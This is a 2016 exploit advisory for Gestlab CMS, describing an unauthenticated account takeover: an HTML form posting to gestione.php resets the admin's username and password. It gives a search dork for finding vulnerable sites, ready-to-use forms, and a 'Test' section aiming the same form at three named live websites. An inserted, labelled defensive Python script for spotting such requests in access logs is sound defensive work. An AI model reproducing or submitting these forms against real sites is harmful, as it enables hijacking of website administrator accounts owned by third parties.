# Exploit Title: Gestlab CMS Script Admin User Password Changer
# Date: 2016-09-13
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.clicom.it/
# Version: All Versions
# Dork : "Website by Clicom" or "Questo sito utilizza i cookie."
Exploit :
Admin Panel : http://site/gestlab/
<form method="post" action="http://site/gestlab/gestione.php" enctype="multipart/form-data">
iduser : <input type="text" name="iduser" value="1"><br> <!-- user id -->
user : <input type="text" name="user" value="new username"><br> <!-- new username -->
pass : <input type="text" name="pass" value="new password"><br> <!-- new password -->
<input type="submit" name="submit" value="moduser">
</form>
After the page loads or an alert is shown, go to http://site/gestlab/
You can now log in with the new username and password :)
Example :
<form method="post" action="http://site/gestlab/gestione.php" enctype="multipart/form-data">
iduser : <input type="text" name="iduser" value="1"><br> <!-- user id -->
user : <input type="text" name="user" value="meisam"><br> <!-- new username -->
pass : <input type="text" name="pass" value="meisam"><br> <!-- new password -->
<input type="submit" name="submit" value="moduser">
</form>
After running this exploit, the username and password are both: meisam
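Added example for defenders, not part of the original advisory: a Python log-triage script that flags POST requests to /gestlab/gestione.php whose Referer is missing or points off-site, which is how a form hosted outside the site (as above) shows up in an access log. The log lines, IP addresses and host names are constructed samples, and the "combined" log format is an assumption.

```python
import re
from urllib.parse import urlsplit

# Apache/Nginx "combined" access-log format (assumed).
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"'
)
ENDPOINT = "/gestlab/gestione.php"  # path taken from the advisory

# Constructed sample lines (documentation IP ranges, example hosts).
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Sep/2016:10:01:02 +0000] "POST /gestlab/gestione.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [13/Sep/2016:10:05:00 +0000] "POST /gestlab/gestione.php HTTP/1.1" 200 498 "http://www.example.com/gestlab/" "Mozilla/5.0"',
    '203.0.113.5 - - [13/Sep/2016:10:09:41 +0000] "POST //gestlab/gestione.php?x=1 HTTP/1.1" 200 512 "http://other.example/form.html" "Mozilla/5.0"',
    '192.0.2.10 - - [13/Sep/2016:10:10:00 +0000] "GET /gestlab/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

def find_suspect_posts(lines, site_hosts):
    """Return POSTs to the endpoint whose Referer is missing or off-site."""
    site_hosts = {h.lower() for h in site_hosts}
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Drop the query string and collapse repeated slashes before comparing.
        path = re.sub(r"/+", "/", m["target"].split("?", 1)[0]).lower()
        if not path.endswith(ENDPOINT):
            continue
        ref = m["referer"]
        ref_host = "" if ref in ("", "-") else (urlsplit(ref).hostname or "")
        if ref_host.lower() in site_hosts:
            continue  # form was posted from a page on the site itself
        hits.append({"ip": m["ip"], "time": m["ts"],
                     "status": int(m["status"]), "referer": ref or "-"})
    return hits

if __name__ == "__main__":
    for hit in find_suspect_posts(SAMPLE_LOG, {"www.example.com"}):
        print(hit)
```

A missing or off-site Referer is only a triage signal, since clients can strip or forge the header; the fix belongs in gestione.php, which should require an authenticated admin session before acting on a moduser request.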
Test :
<form method="post" action="http://eletras.it/gestlab/gestione.php" enctype="multipart/form-data">
iduser : <input type="text" name="iduser" value="1"><br>
user : <input type="text" name="user" value="meisam"><br>
pass : <input type="text" name="pass" value="meisam"><br>
<input type="submit" name="submit" value="moduser">
</form>
<form method="post" action="http://www.ristoservicesrl.com/gestlab/gestione.php"enctype="multipart/form-data">
iduser : <input type="text" name="iduser" value="1"><br>
user : <input type="text" name="user" value="meisam"><br>
pass : <input type="text" name="pass" value="meisam"><br>
<input type="submit" name="submit" value="moduser">
</form>
<form method="post" action="http://www.mcm-america.com/gestlab/gestione.php"enctype="multipart/form-data">
iduser : <input type="text" name="iduser" value="1"><br>
user : <input type="text" name="user" value="meisam"><br>
pass : <input type="text" name="pass" value="meisam"><br>
<input type="submit" name="submit" value="moduser">
</form>